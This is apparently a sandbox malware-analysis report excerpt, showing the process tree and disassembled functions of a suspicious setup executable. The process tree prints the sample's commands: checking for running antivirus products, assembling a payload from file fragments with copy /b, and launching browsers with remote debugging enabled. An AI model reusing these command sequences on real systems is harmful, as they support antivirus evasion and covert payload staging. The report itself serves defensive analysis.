Start date:	05/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c copy Premium Premium.cmd && Premium.cmd
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	15:50:13
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	15:50:16
Start date:	05/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x4a0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	15:50:17
Start date:	05/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa opssvc"
Imagebase:	0x7ff6068e0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	15:50:17
Start date:	05/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x4a0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	15:50:17
Start date:	05/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0xf00000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	15:50:18
Start date:	05/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 402438
Imagebase:	0x7ff632ac0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	15:50:18
Start date:	05/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "integratedintlhandlingwaterproofcbperformtreasurertim" Recording
Imagebase:	0xf00000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	15:50:18
Start date:	05/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Coaches + ..\Hypothetical + ..\Nasty + ..\Fly + ..\Zum + ..\Disclose + ..\Expensive + ..\Argue N
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	15:50:18
Start date:	05/12/2024
Path:	C:\Users\user\AppData\Local\Temp\402438\Suicide.com
Wow64 process (32bit):	true
Commandline:	Suicide.com N
Imagebase:	0x5e0000
File size:	893'608 bytes
MD5 hash:	6EE7DDEBFF0A2B78C7AC30F6E00D1D11
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	15:50:18
Start date:	05/12/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0xc20000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	15:51:46
Start date:	05/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	15:51:47
Start date:	05/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2296,i,7454184936104441568,15568927826006656049,262144 /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	15:52:01
Start date:	05/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	4.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	22.9%
Total number of Nodes:	1329
Total number of Limit Nodes:	30

Executed Functions

Function 0085AC00 Relevance: 51.6, APIs: 11, Strings: 18, Instructions: 827libraryloaderCOMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?,SystemFolder,0000000C), ref: 0085AE40
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0085AF2A
GetWindowsDirectoryW.KERNEL32(?,00000104,WindowsFolder,0000000D), ref: 0085B04F

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

GetWindowsDirectoryW.KERNEL32(?,00000104,WindowsVolume,0000000D), ref: 0085B156

Part of subcall function 006EA7A0: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,?,0088A498,\\.\pipe\ToServer,?,00000000,?,?,00941D06,000000FF,?,00889991), ref: 006EA7C3

GetModuleFileNameW.KERNEL32(00000000,?,00000104,WindowsVolume,0000000D), ref: 0085B291
SHGetSpecialFolderLocation.SHELL32(00000000,?,WindowsVolume,0000000D), ref: 0085B372
LoadLibraryW.KERNEL32(shfolder.dll), ref: 0085B402
GetProcAddress.KERNEL32(?,SHGetFolderPathW), ref: 0085B442

Part of subcall function 0084EDD0: LoadLibraryW.KERNEL32(Shlwapi.dll,-00000001,00000000,?,?,?,?,?,?,?,?,0085B51B,?), ref: 0084EDEF
Part of subcall function 0084EDD0: GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 0084EE05
Part of subcall function 0084EDD0: FreeLibrary.KERNEL32(00000000), ref: 0084EE48

GetEnvironmentVariableW.KERNEL32(APPDATA,?,00000104), ref: 0085B660
SHGetPathFromIDListW.SHELL32(?,?), ref: 0085B6F5
SHGetMalloc.SHELL32(00000000), ref: 0085B70E

Strings

SHGetFolderPathW, xrefs: 0085B43C
shfolder.dll, xrefs: 0085B3FD
Shell32.dll, xrefs: 0085B53D
WindowsFolder, xrefs: 0085AFC3, 0085AFD8, 0085AFE2
APPDATA, xrefs: 0085B657, 0085B65F
TempFolder, xrefs: 0085B182
WindowsVolume, xrefs: 0085B0CF, 0085B0E4, 0085B0EE
&_', xrefs: 0085AC17
SETUPEXEDIR, xrefs: 0085B23E
Shlwapi.dll, xrefs: 0085B511
ProgramFilesFolder, xrefs: 0085B581
ProgramW6432, xrefs: 0085AC94
ProgramFiles64Folder, xrefs: 0085AC38
SystemFolder, xrefs: 0085ADA1, 0085ADB6, 0085ADC0
System32Folder, xrefs: 0085AE9E, 0085AEB3, 0085AEBD
PROGRAMFILES, xrefs: 0085B63D
ProgramFiles, xrefs: 0085B5B5
AppDataFolder, xrefs: 0085B5C7, 0085B605

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: DirectoryLibrary$AddressFolderLoadPathProcWindows$EnvironmentFileFindFreeFromHeapListLocationMallocModuleNameProcessResourceSpecialSystemVariable
String ID: APPDATA$AppDataFolder$PROGRAMFILES$ProgramFiles$ProgramFiles64Folder$ProgramFilesFolder$ProgramW6432$SETUPEXEDIR$SHGetFolderPathW$Shell32.dll$Shlwapi.dll$System32Folder$SystemFolder$TempFolder$WindowsFolder$WindowsVolume$shfolder.dll$&_'
API String ID: 2967964373-4001642121
Opcode ID: 40d650735add66e47644be90a4f1ea89291e9af6d90583505d845071b602661c
Instruction ID: 7ff66bf7a07a21977b0d2f91959f59fd492520aff17b0c5552c8a7934e583c26
Opcode Fuzzy Hash: 40d650735add66e47644be90a4f1ea89291e9af6d90583505d845071b602661c
Instruction Fuzzy Hash: 8462F834A002198BDB28DF64CC55BB9B3B2FFA4315F5442A9DC16D7391EB329E49CB50

Function 0085ED00 Relevance: 38.1, APIs: 15, Strings: 6, Instructions: 1346libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

LoadLibraryExW.KERNEL32(00000000,00000000,00000001,000000FF,00000000,00000000,000000FF,00000000,?,000000FF), ref: 0085EE90

Strings

Command line to pass to MSI:, xrefs: 0085F5AB
Full command line:, xrefs: 0085F4F8
====== Starting logging of ", xrefs: 0085EF4A, 0085EF5C, 0085EF66
" ====, xrefs: 0085EF8E
Advinst_, xrefs: 0085F885, 0085F897, 0085F8A1
&_', xrefs: 0085ED14, 0085ED97, 0085F254, 0085FD64

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: HeapLibraryLoadProcess
String ID: ====== Starting logging of "$" ====$Advinst_$Command line to pass to MSI:$Full command line:$&_'
API String ID: 3872204244-3331129814
Opcode ID: 7422f015f23e09f267e49bc839b9394b45bbc127894edab8c33a8ae0a95bdd85
Instruction ID: 9f5595706ae9d368171108d058b076c97fd062422b0e263446a86bdfff53dcd1
Opcode Fuzzy Hash: 7422f015f23e09f267e49bc839b9394b45bbc127894edab8c33a8ae0a95bdd85
Instruction Fuzzy Hash: A4B2BD71A002088BDB04DFA8CC55BAEB7B5FF44325F144269ED16EB3D2DB74AA05CB91

Function 008882B0 Relevance: 32.0, APIs: 14, Strings: 4, Instructions: 493
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0088832B
GetLastError.KERNEL32 ref: 00888335
GetUserNameW.ADVAPI32(?,?), ref: 0088837D
GetEnvironmentVariableW.KERNEL32(UserDomain,00000000,00000000), ref: 008883B7
GetEnvironmentVariableW.KERNEL32(UserDomain,?,00000000,-00000001,00000000), ref: 00888402
RegDeleteValueW.KERNEL32(?,?,00000000,80000001,00000001,00000000,275F26E1), ref: 008885B8
RegCloseKey.ADVAPI32(?,?,00000000,80000001,00000001,00000000,275F26E1), ref: 008885E8
RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,275F26E1,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0088872D
RegCloseKey.ADVAPI32(?,?,00000000,80000001,00000001,00000000), ref: 0088876F
RegCloseKey.ADVAPI32(?,?,00000000,80000001,00000001,00000000), ref: 008887B8
RegDeleteKeyW.ADVAPI32(?,00000000), ref: 008887DE
RegCloseKey.ADVAPI32(?,?,00000000,80000001,00000001,00000000), ref: 0088881A
RegDeleteValueW.KERNEL32(?,?,?,80000001,00000001,00000000,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000031,?,00000000,80000001,00000001,00000000), ref: 00888912
RegCloseKey.ADVAPI32(?,?,?,?,80000001,00000001,00000000,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000031,?,00000000,80000001,00000001,00000000), ref: 00888954

Strings

Software, xrefs: 00888608
UserDomain, xrefs: 008883B2, 008883FD
&_', xrefs: 008882C4, 0088852B
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00888833

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Close$Delete$EnvironmentNameUserValueVariable$ErrorInfoLastQuery
String ID: Software$Software\Microsoft\Windows\CurrentVersion\RunOnce$UserDomain$&_'
API String ID: 1615433478-195769295
Opcode ID: 857d28c3408558d882dd2ff5655b65fd3f64777fc2d70ac5932401fe11c821cb
Instruction ID: c07f51197ef818269cee83b076bd1668f7b7fd3f8db5d960babc38dd3d114f9e
Opcode Fuzzy Hash: 857d28c3408558d882dd2ff5655b65fd3f64777fc2d70ac5932401fe11c821cb
Instruction Fuzzy Hash: 08226A70D00248DFDB24EFA8CD59BEEBBB5FF54304F208158E505A7281EB746A89CB95

Function 0086E090 Relevance: 22.8, APIs: 11, Strings: 1, Instructions: 1814COMMON

Download Yara Rule

Strings

&_', xrefs: 0086E0BB

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: HeapProcess
String ID: &_'
API String ID: 54951025-2411122644
Opcode ID: 6a688c92d9b30fe4ac44fa707d41a0b946869f04ecafb2f02d42f7828e454cd2
Instruction ID: 09e4686812e7aa7f11c5a2915859539ee7f3e7efac654088dddc4e2ba78ca130
Opcode Fuzzy Hash: 6a688c92d9b30fe4ac44fa707d41a0b946869f04ecafb2f02d42f7828e454cd2
Instruction Fuzzy Hash: DD03B8B09006588FDB24CF28CC547AEBBB1BF45314F1582D9DA19A7392DB70AE85CF85

Function 0083F660 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 119
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0083F6B2
OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 0083F6BF
GetLastError.KERNEL32 ref: 0083F6C9
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00985B35), ref: 0083F6ED
GetLastError.KERNEL32 ref: 0083F6F7
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00985B35,00985B35,00985B35,00985B35), ref: 0083F71D
AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0083F754
EqualSid.ADVAPI32(00000000,?), ref: 0083F763
FreeSid.ADVAPI32(?), ref: 0083F772
CloseHandle.KERNEL32(00000000), ref: 0083F7AC

Strings

&_', xrefs: 0083F674

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Token$ErrorInformationLastProcess$AllocateCloseCurrentEqualFreeHandleInitializeOpen
String ID: &_'
API String ID: 695978879-2411122644
Opcode ID: e40ab52b626a5cecb16476a5bb361f203b5b15991f5005849e6b8750e617315c
Instruction ID: b7722db296766f0712092fe625d4b4fdf0d484c5bba83f12d5b26f1de22f1d78
Opcode Fuzzy Hash: e40ab52b626a5cecb16476a5bb361f203b5b15991f5005849e6b8750e617315c
Instruction Fuzzy Hash: D2414771E04259ABDF10DFE4DD49BEEBBB8FF08315F108029E511B22A0D7795A49CBA0

Function 0084C3B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 339
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(?,00000000,?,00000100), ref: 0084C49E
LoadStringW.USER32(?,00000000,?,00000001), ref: 0084C5BE
CLSIDFromString.COMBASE(00000000,?), ref: 0084C73A
SysFreeString.OLEAUT32(00000000), ref: 0084C74E
SysAllocStringLen.OLEAUT32(?,?), ref: 0084C775
LocalFree.KERNEL32(00000000,275F26E1,?,?,00000000,00987B5D,000000FF,?,80070057,275F26E1), ref: 0084C7D8

Strings

&_', xrefs: 0084C3D8, 0084C704, 0084C7B3

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: String$FreeLoad$AllocFromLocal
String ID: &_'
API String ID: 633247902-2411122644
Opcode ID: 5c077e422deebd3b1755d92b32e5e981461a1cc153dc0e58a28f56ca4a8af64c
Instruction ID: 2a7b229d8a6215059b792e2e793148dabe68e43ce8a127f73a6c133855a43891
Opcode Fuzzy Hash: 5c077e422deebd3b1755d92b32e5e981461a1cc153dc0e58a28f56ca4a8af64c
Instruction Fuzzy Hash: E2D18E71E1524C9BDB04DFA8CD45BEEBBB5FF48314F10821AE815E7290EB746A45CB90

Function 008481D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ComCtl32.dll,275F26E1,00000000,00000000,?), ref: 0084820A
GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 00848230
FreeLibrary.KERNEL32(00000000), ref: 008482B9

Strings

LoadIconMetric, xrefs: 0084822A
ComCtl32.dll, xrefs: 008481FE
&_', xrefs: 008481E7

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: ComCtl32.dll$LoadIconMetric$&_'
API String ID: 145871493-2870637383
Opcode ID: 7c3a982344ca001b2e2e136a35d1f798b7af83ecc9478abaa885cc25c7fa3a8f
Instruction ID: be41411804193f03f981b9c157f578426f466eba38535ed7f8b1bc9ba75a61a9
Opcode Fuzzy Hash: 7c3a982344ca001b2e2e136a35d1f798b7af83ecc9478abaa885cc25c7fa3a8f
Instruction Fuzzy Hash: 6B319C71A04219ABCB118F98CC09BAEBBF8FB45751F004229F815F7290DBB59D019B90

Function 0086D390 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 251fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00000000,00000000,00000000,?), ref: 0086D4F6
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,009F03D4,0098DA75,000000FF), ref: 0086D52B
DeleteFileW.KERNEL32(?,?,00000000,275F26E1,00000000,00000000,?), ref: 0086D5CF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,009F03D4,0098DA75,000000FF), ref: 0086D5D9

Strings

&_', xrefs: 0086D3AF

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: FileFind$CloseDeleteErrorFirstLast
String ID: &_'
API String ID: 1196482317-2411122644
Opcode ID: bc4fc6f27d6840889eae1a64bf9a6c961485a247538f7716f480833de4bdec8f
Instruction ID: 1b20ce531f8f4b78d39a9a78e3313ec388aa332e9ccf488b41b162f18173687d
Opcode Fuzzy Hash: bc4fc6f27d6840889eae1a64bf9a6c961485a247538f7716f480833de4bdec8f
Instruction Fuzzy Hash: 7BA19E70E003498BCF15DFA8C898BADB7B1FF49318F194169E816DB291DB70AD45CB91

Function 007115D0 Relevance: 8.1, Strings: 6, Instructions: 569COMMON

Download Yara Rule

Strings

MultipleInstances, xrefs: 00711636
AI_EXIST_INSTANCES, xrefs: 00711853
MultipleInstancesProps, xrefs: 00711700, 00711B6E
PropertyValue, xrefs: 00711C78
AI_EXIST_NEW_INSTANCES, xrefs: 007119B9
&_', xrefs: 007115E4, 00711AE7

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID:
String ID: AI_EXIST_INSTANCES$AI_EXIST_NEW_INSTANCES$MultipleInstances$MultipleInstancesProps$PropertyValue$&_'
API String ID: 0-2612323807
Opcode ID: c34a3ded05d4c4d7b001c9aaba267a68ccd0efe49643e751a4f4f55b919bdf30
Instruction ID: d3757d344270b6036e2e75667f0f9b5f494ea520715546abfba3c982d017fdc8
Opcode Fuzzy Hash: c34a3ded05d4c4d7b001c9aaba267a68ccd0efe49643e751a4f4f55b919bdf30
Instruction Fuzzy Hash: 8532D570E012489FDF04DFA8C859BEEBBB1AF45314F648249E505BB2D1DB786AC4CB91

Function 00844D70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00000001,00000000,?,00000001), ref: 00844E11
FindClose.KERNEL32(00000000), ref: 00844E70

Part of subcall function 006EAF70: RtlAllocateHeap.NTDLL(?,00000000,?,275F26E1,00000000,0093C660,000000FF,?,?,00A5D9BC,?,00000000,0088F88B,8000000B,275F26E1), ref: 006EAFBA

Strings

&_', xrefs: 00844D87

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

